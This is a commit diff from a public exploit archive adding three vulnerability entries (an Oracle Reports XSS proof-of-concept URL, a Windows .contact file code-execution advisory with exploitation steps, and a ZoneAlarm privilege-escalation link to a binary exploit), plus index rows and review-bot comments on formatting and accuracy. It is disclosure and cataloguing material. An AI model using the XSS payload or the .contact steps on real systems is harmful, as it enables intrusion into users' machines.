DB: 2019-01-18
3 changes to exploits/shellcodes

Microsoft Windows CONTACT - Remote Code Execution
Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation
Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting
parent fa261f0558
commit fade9b8cd4
4 changed files with 99 additions and 0 deletions
11
exploits/multiple/webapps/46187.txt
Normal file
|
@ -0,0 +1,11 @@
|
|||
# Exploit Title: [Cross-site Scripting (XSS)]
|
||||
# Date: [2019-01-15]
|
||||
# Exploit Author: [Mohamed M.Fouad - From SecureMisr Company]
|
||||
# Vendor Homepage: [https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html]
|
||||
# Version: [12.2.1.3] (REQUIRED)
|
||||
# Tested on: [Windows 10]
|
||||
# CVE : [CVE-2019-2413]
|
||||
|
||||
POC:
|
||||
|
||||
https://<ip>/reports/rwservlet/showenv%22%3E%3Cimg%20src=x%20onerror=prompt(1);%3E
|
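Review bot: The header of 46187.txt still carries template residue and never names the product. The `# Exploit Title:` line reads only `[Cross-site Scripting (XSS)]`, the `# Version:` line ends in `(REQUIRED)`, and every value is still wrapped in the template's square brackets. Suggest using the title this commit records for the entry in the index, "Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting", and dropping `(REQUIRED)` and the brackets. The `# Vendor Homepage:` value points at a security-advisory page (cpujan2019-5072801.html) rather than a homepage; labelling it as the vendor advisory would be more accurate and tells a defender where to look for fix information on CVE-2019-2413.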
68
exploits/windows/local/46188.txt
Normal file
|
@ -0,0 +1,68 @@
|
|||
[+] Credits: John Page (aka hyp3rlinx)
|
||||
[+] Website: hyp3rlinx.altervista.org
|
||||
[+] Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt
|
||||
[+] ISR: ApparitionSec
|
||||
|
||||
|
||||
[Vendor]
|
||||
www.microsoft.com
|
||||
|
||||
|
||||
[Product]
|
||||
Microsoft .CONTACT File
|
||||
|
||||
A file with the CONTACT file extension is a Windows Contact file. They're used in Windows 10, Windows 8, Windows 7, and Windows Vista.
|
||||
This is the folder where CONTACT files are stored by default: C:\Users\[USERNAME]\Contacts\.
|
||||
|
||||
|
||||
[Vulnerability Type]
|
||||
Insufficient UI Warning Arbitrary Code Execution
|
||||
|
||||
|
||||
[Security Issue]
|
||||
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows.
|
||||
User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.
|
||||
|
||||
The flaw is due to the processing of ".contact" files <c:Url> node param which takes an expected website value, however if an attacker references an
|
||||
executable file it will run that instead without warning instead of performing expected web navigation. This is dangerous and would be unexpected to an end user.
|
||||
|
||||
e.g.
|
||||
|
||||
<c:Url c:ElementID="xxxxxxxxxxxxxxxxxxxxxxxx"><c:Value>www.hyp3rlinx.altervista.com</c:Value>
|
||||
|
||||
Executable files can live in a sub-directory so when the ".contact" website link is clicked it traverses directories towards the executable and runs.
|
||||
Making matters worse is if the the files are compressed then downloaded "mark of the web" (MOTW) may potentially not work as expected with certain archive utilitys.
|
||||
|
||||
The ".\" chars allow directory traversal to occur in order to run the attackers supplied executable sitting unseen in the attackers directory.
|
||||
This advisory is a duplicate issue that currently affects Windows .VCF files, and released for the sake of completeness as it affects Windows .contact files as well.
|
||||
|
||||
|
||||
[Exploit/POC]
|
||||
Rename any executable file extension from ".exe" to ".com" to be like a valid web domain name.
|
||||
Create a directory to house the executable file
|
||||
Modify the contact file website link like ---> http.\\www.<executable-name>.com
|
||||
Contact website link now points at "dir .\ executable" ---> http.\\www.<executable-name>.com
|
||||
Compress the files using archive utility and place in webserver for download.
|
||||
|
||||
|
||||
[POC Video URL]
|
||||
https://vimeo.com/311759191
|
||||
|
||||
|
||||
[Disclosure Timeline]
|
||||
Reported to ZDI 2018-11-30
|
||||
This exact same vulnerability exists and affects Microsoft Windows .VCF files sharing the same root cause and was publicly disclosed 2019-01-10.
|
||||
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
|
||||
Public disclosure : January 16, 2019
|
||||
|
||||
|
||||
|
||||
[+] Disclaimer
|
||||
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
|
||||
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
|
||||
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
|
||||
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
|
||||
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
|
||||
or exploits by the author or elsewhere. All content (c).
|
||||
|
||||
hyp3rlinx
|
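Review bot: In the [Security Issue] section of 46188.txt, the `e.g.` snippet is not well-formed and does not match the behaviour described around it. `<c:Url c:ElementID="..."><c:Value>www.hyp3rlinx.altervista.com</c:Value>` has no closing `</c:Url>`, and its value is an ordinary host name, while the surrounding text and the [Exploit/POC] steps describe a `http.\\www.<executable-name>.com` value. Suggest closing the element and stating explicitly that the snippet shows the expected website value. The same section has typos ("the the", "utilitys"). The [Disclosure Timeline] records the ZDI report and the public disclosure dates but no vendor response or fix status, which is the information a reader assessing exposure needs.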
17
exploits/windows/local/46189.txt
Normal file
|
@ -0,0 +1,17 @@
|
|||
# Exploit Title: Check Point ZoneAlarm Local Privilege Escalation
|
||||
# Date: 1/16/19
|
||||
# Exploit Author: Chris Anastasio
|
||||
# Vendor Homepage: https://www.zonealarm.com/software/free-antivirus/
|
||||
# Software Link: Vulnerable Versions included in repo
|
||||
# Version:
|
||||
ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729
|
||||
Vsmon version: 15.3.58.17668
|
||||
Driver version: 15.1.29.17237
|
||||
Antivirus engine version: 8.8.1.110
|
||||
Antivirus signature DAT file version: 1297458144
|
||||
# Tested on: Windows 7/Windows 10
|
||||
# Vendor Disclosure: https://supportcenter.checkpoint.com/supportcenter/portal?eventSubmit_doGoviewsolutiondetails=&solutionid=sk142952
|
||||
|
||||
POC:
|
||||
|
||||
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/bin-sploits/46189.zip
|
|
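Review bot: 46189.txt contains no description of the vulnerability. After the version list, the `POC:` section is only a link to 46189.zip, so a reader cannot tell which component is affected or how to check exposure without downloading a binary archive. Suggest adding a short description of the flaw and the fixed version, taken from the vendor disclosure (sk142952) already linked in the header. Also in the header, `# Date: 1/16/19` is ambiguous and should use the ISO date form the index uses, and `# Software Link: Vulnerable Versions included in repo` does not say which repository is meant.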
@ -10225,6 +10225,8 @@ id,file,description,date,author,type,platform,port
|
|||
46167,exploits/windows/local/46167.txt,"Microsoft Windows VCF - Remote Code Execution",2019-01-15,hyp3rlinx,local,windows,
|
||||
46185,exploits/windows/local/46185.txt,"Microsoft Windows 10 - XmlDocument Insecure Sharing Privilege Escalation",2019-01-16,"Google Security Research",local,windows,
|
||||
46186,exploits/linux/local/46186.rb,"blueman - set_dhcp_handler D-Bus Privilege Escalation (Metasploit)",2019-01-16,Metasploit,local,linux,
|
||||
46188,exploits/windows/local/46188.txt,"Microsoft Windows CONTACT - Remote Code Execution",2019-01-17,hyp3rlinx,local,windows,
|
||||
46189,exploits/windows/local/46189.txt,"Check Point ZoneAlarm 8.8.1.110 - Local Privilege Escalation",2019-01-17,"Chris Anastasio",local,windows,
|
||||
1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
|
||||
2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
|
||||
5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
|
||||
|
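Review bot: The description of the 46189 row gives the version as 8.8.1.110, which 46189.txt lists as the antivirus engine version. The product version there is "ZoneAlarm Free Antivirus + Firewall version: 15.3.064.17729". Suggest using the product version in the description, or naming the engine explicitly, so that version-based lookups against this index match what is installed. The 46188 row is titled "Remote Code Execution" but is filed under exploits/windows/local with type `local`. That is consistent with the existing 46167 VCF row, but the advisory itself states that user interaction with a file is required, so a description that says so would be less misleading for triage.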
@ -40664,3 +40666,4 @@ id,file,description,date,author,type,platform,port
|
|||
46179,exploits/hardware/webapps/46179.txt,"GL-AR300M-Lite 2.27 - Authenticated Command Injection / Arbitrary File Download / Directory Traversal",2019-01-16,"Pasquale Turi",webapps,hardware,80
|
||||
46180,exploits/hardware/webapps/46180.html,"Coship Wireless Router 4.0.0.48 / 4.0.0.40 / 5.0.0.54 / 5.0.0.55 / 10.0.0.49 - Unauthenticated Admin Password Reset",2019-01-16,"Adithyan AK",webapps,hardware,80
|
||||
46182,exploits/php/webapps/46182.py,"Blueimp's jQuery File Upload 9.22.0 - Arbitrary File Upload Exploit",2019-01-16,"Larry W. Cashdollar",webapps,php,80
|
||||
46187,exploits/multiple/webapps/46187.txt,"Oracle Reports Developer Component 12.2.1.3 - Cross-site Scripting",2019-01-17,"Mohamed M.Fouad",webapps,multiple,443
|
||||
|
|